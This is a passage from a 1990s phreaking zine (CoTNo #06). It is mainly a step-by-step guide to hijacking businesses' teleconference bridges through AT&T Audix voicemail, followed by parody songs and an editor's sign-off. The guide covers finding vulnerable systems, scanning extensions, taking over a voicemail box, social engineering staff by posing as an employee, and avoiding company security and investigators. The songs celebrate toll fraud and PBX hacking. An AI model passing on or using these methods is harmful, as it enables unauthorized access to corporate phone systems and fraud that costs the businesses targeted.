|
||
and get messages from people who I didn't even know saying "Hey,man,thanx
|
||
for puttin up that bridge!". These days I don't even bother. I don't WANT
|
||
to talk to half these idiots that are around today.
|
||
|
||
Anyway, lets say you want to find a bridge. Go through the phonebook and look
|
||
up the all the big businesses. Call the main numbers that you find after
|
||
hours and find out which ones have voice mail systems. In this article, I
|
||
will focus on the Audix voicemail system made by AT&T so look for those. To
|
||
tell if your target is using Audix, press *8 during the greet, and if it says
|
||
"Enter the four digit extension and pound sign." you have found one. A
|
||
complete guide to hacking Audix voice mail can be found in CoTNo #1,
|
||
article #1. Railroad companies like CSX and AT&T owned companies like
|
||
Transtech, or Card Services often have Audix systems with bridges.
|
||
|
||
Once you have the targeted Audix system,you need to start scanning for the
|
||
system extensions. Hit *6 for the names directory and try entering
|
||
CONFERENCE, BRIDGE, or TELE. You COULD possibly get the actual extension to
|
||
the bridge spit out right at you (as with CSX's system),or at least most
|
||
systems have that extension where you hear the person state their name
|
||
"Conference Planning". If this is the case,you need to get a voice mail
|
||
box off the system and send a message to whatever extension Conference
|
||
Planning is saying something like "Yes, I need a conference set up for
|
||
such and such a date & such and such a time". This will more than likely
|
||
work and Conference Planning will respond usually with either "No problem,
|
||
the teleconference bridge is at XXXX" or "All we need is the PIN
|
||
number you want."
|
||
|
||
However, a lot of systems do not have their *6 directory system configured
|
||
very good at all, so you might want to try scanning all the XX00 and XX99
|
||
and find out where all the computer-related extensions are located at.
|
||
Or you might want to social engineer it out of one of the people located
|
||
at an extension. Try calling from within your box and acting like you work
|
||
there.
|
||
|
||
Once you have found what you think is the bridge,you need to test it out
|
||
with a friend. If he calls into the same extension and gets a busy signal,
|
||
you may want tell him to try the next extension up. If the bridge is
|
||
multi-lined, have him figure out how many lines the bridge has and make
|
||
sure the lines are all going to the same bridge and not 3 different
|
||
bridges or something. Note that if you are scanning on a Railroad
|
||
companies system, you will sometimes come to an extension you might think
|
||
is a bridge and end up to be dispatchers. So once you sign on to what you
|
||
believe is the bridge,hit a few dtmf tones and make sure you don't hear
|
||
someone say "You done hittin funny buttons!!!" or "dispatcher,mike."
|
||
|
||
SECURITY ON A BRIDGE.
|
||
---------------------
|
||
Security on a bridge is a lot different than on an alliance or on a k0nPh.
|
||
You usually don't have to worry about it getting cancelled and the bridge
|
||
usually will not ever go down if you don't third-party or collect call to
|
||
it. You are not dealing with the phone company here, you are dealing
|
||
with whatever business owns it, and if they detect a lot of activity on
|
||
the extension, they will usually either warn you to leave by recording the
|
||
conversations and playing them back to you, or just change the extension.
|
||
DO expect to be dealing with the business communication security person,
|
||
though, at one time or another. They will usually talk to you and explain to
|
||
you why they need you to leave, and most of the time I found out, it wasn't
|
||
because of the people using their bridge, it was because of the collect-
|
||
calling, third party billing or the fact that people were using it via the
|
||
800 number and the company was having to pick up the tab. I don't recommend
|
||
finding a bridge and giving it to the entire world because when you are
|
||
not on, you don't know what goes on in the conversation, and if the company
|
||
does finally decide to get it investigated, the investigators seem to go
|
||
after the same thing every time: the source that gave out the bridge in
|
||
the first place.
|
||
|
||
CONCLUSION
|
||
----------
|
||
Hopefully you have learned something from all this. With a little time and
|
||
patience, you can set up a bridge that will last for weeks, maybe months.
|
||
And besides, hacking out a phone system will teach you a lot more than
|
||
than setting up a k0nPh off your neighbor's phone terminal. So next time
|
||
you see someone flash "k0nPhiNf0!?", tell them to get off there ass and
|
||
try hacking one out for a change.
|
||
|
||
|
||
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
||
|
||
|
||
|
||
Elite Music Part V
|
||
- Disk Jockey/WR -
|
||
|
||
|
||
Please note the /WR. Until now I have not been in textfiles at large, only
|
||
a few given to good friends. There have been other `DJ's out there; as many
|
||
as six by my count, so far. So even that my group has had but one member
|
||
for over four years, I keep the tag to distinguish myself.
|
||
|
||
Well, while on a (pretty lame, I must admit) conference with a barrage of
|
||
lame people, sending streams of DTMF tones, long belches, humming, and
|
||
music down the line, I got an idea. At one point the B-52's `Roam' was
|
||
played in the background during a half-intelligent discussion of cellular
|
||
telecommunications. These lyrics almost came to me almost immediately, and
|
||
these are the results. I intend to record this song for real in a few
|
||
months or so; I do have the instrumental of the real song and it would be
|
||
somewhat fun to do. Maybe a .AU will be out there on the Web, sometime...
|
||
and by that time these lame people might grow up. (But, I can't ask for
|
||
everything.)
|
||
|
||
"Phone Roam"
|
||
|
||
Roam cyberspace, switching through every carrier
|
||
Oh girl won't you lend me one of those codes
|
||
Take it trunk to trunk, hopping through the satellites
|
||
Around the world, the call flags switchboard lights
|
||
|
||
Roam if you want to, roam around the world
|
||
Roam if you want to, without codes, without cards
|
||
Roam if you want to, roam around the world
|
||
Roam if you want to, without anything but an ESN
|
||
|
||
Hit conferences where you'll lose your mind
|
||
Toners and lamers, leave them all behind
|
||
Take it trunk to trunk, hopping through the satellites
|
||
Around the world, the call flags switchboard lights
|
||
|
||
Roam if you want to, roam around the world
|
||
Roam if you want to, without codes, without cards
|
||
Roam if you want to, roam around the world
|
||
Roam if you want to, without anything but an ESN
|
||
|
||
Go ahead and roam, go ahead and roam
|
||
|
||
Scan all you can while the Feds trace you
|
||
Hack up PBXs till your hands get tired
|
||
Take it trunk to trunk, hopping through the satellites
|
||
Around the world, the call flags switchboard lights
|
||
|
||
Roam if you want to, roam around the world
|
||
Roam if you want to, without codes, without cards
|
||
Roam if you want to, roam around the world
|
||
Roam if you want to, without anything but an ESN
|
||
|
||
Take it trunk to trunk, hopping through the satellites
|
||
Take it trunk to trunk, hopping through the satellites
|
||
Take it trunk to trunk, hopping through the satellites
|
||
Take it trunk to trunk, hopping through the satellites
|
||
Take it trunk to trunk, hopping through the satellites
|
||
Take it trunk to trunk, hopping through the satellites
|
||
Go ahead and roam, go ahead and roam
|
||
|
||
|
||
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
||
|
||
End of CoTNo #06
|
||
|
||
I know you expect some snappy ending as usual to another successful issue
|
||
of Communications of The New Order, but considering the grimness of much
|
||
of this issue I don't think it would be appropriate. Despite all of the
|
||
bad news that was presented in this issue, I hope that everyone will
|
||
"keep the faith", as it were. Explore, learn, educate. But don't do
|
||
anything stupid. The powers that be are becoming increasingly intent
|
||
upon stopping those who are labeled as "hackers". And everyday, there
|
||
are more of us for them to stop. Everyday, we are being introduced to
|
||
new technologies that few people understand, and few people want to
|
||
understand. Our desire to understand can be achieved, but we must be
|
||
careful.
|
||
|
||
Even though you just read this issue's Elite Music, I thought I would
|
||
finish off with another song that has special significance to me. This
|
||
showed up in my e-mail the other day and it really made me think. I
|
||
hope it is as meaningful to you as it was for me...
|
||
|
||
|
||
TNO MAN
|
||
-------
|
||
To the Tune of Desperado, by The Eagles
|
||
|
||
|
||
TNO man, why don't you come to your senses?
|
||
You been out jumping' fences into those Bell yards.
|
||
Oh you're a smart one, I know that you got your reasons,
|
||
these things that are pleasin' can hurt you somehow.
|
||
|
||
Don't you hack on those old .mil sites,
|
||
they'll catch you if you're lazy,
|
||
you know diverting twice is always your best bet.
|
||
Now it seems to me some eleet things
|
||
have been shown upon your screen
|
||
but you only want the ones that you can't hack.
|
||
|
||
TNO man, oh you ain't gettin' no younger,
|
||
your hunger for knowledge, it's drivin' you on.
|
||
And hacking, oh hacking, well that's just some people talkin',
|
||
your prison is waitin' at the end of the line.
|
||
|
||
Don't your power get old on the Internet?
|
||
The account won't die and the root won't mind,
|
||
it's hard to tell the night time from the day.
|
||
You're losin' all your highs and lows,
|
||
ain't it funny how the feelin' goes away?
|
||
|
||
TNO man, why don't you come to your senses?
|
||
Come down from your firewalls, open the gateway.
|
||
It may be laming' but there's a job waiting for you.
|
||
You better let somebody hire you LET SOMEBODY HIRE YOU
|
||
you better let somebody hire you before it's too late.
|
||
|
||
- Don Henley, Glenn Frey and the Voyager
|
||
|